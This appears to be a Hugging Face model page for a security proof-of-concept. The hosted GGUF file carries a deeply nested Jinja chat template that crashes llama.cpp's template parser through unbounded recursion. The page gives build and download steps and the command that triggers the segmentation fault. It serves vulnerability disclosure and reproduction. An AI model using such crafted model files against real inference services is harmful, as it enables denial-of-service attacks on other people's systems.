PoC: Stack Overflow in llama.cpp Jinja Parser
This is a security research proof-of-concept. Do NOT use this model for inference.
This repository contains a minimal GGUF model file that triggers a stack overflow
(SIGSEGV) in llama.cpp's Jinja template parser due to unbounded recursion in
parse_if_expression() (common/jinja/parser.cpp).
Reproduction
git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
cmake -B build && cmake --build build -j
# Download the PoC model
huggingface-cli download salvepilo/llama-cpp-jinja-crash-poc poc_crash_model.gguf
# Trigger the crash (no --jinja flag needed)
./build/bin/llama-cli -m poc_crash_model.gguf -p 'hello'
# Expected: Segmentation fault (exit code 139)
Files
poc_crash_model.gguf- Malicious GGUF with deeply nested Jinja chat templatecraft_full_gguf_poc.py- Python script to regenerate the PoC file
- Downloads last month
- 2
Hardware compatibility
Log In to add your hardware
We're not able to determine the quantization variants.
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support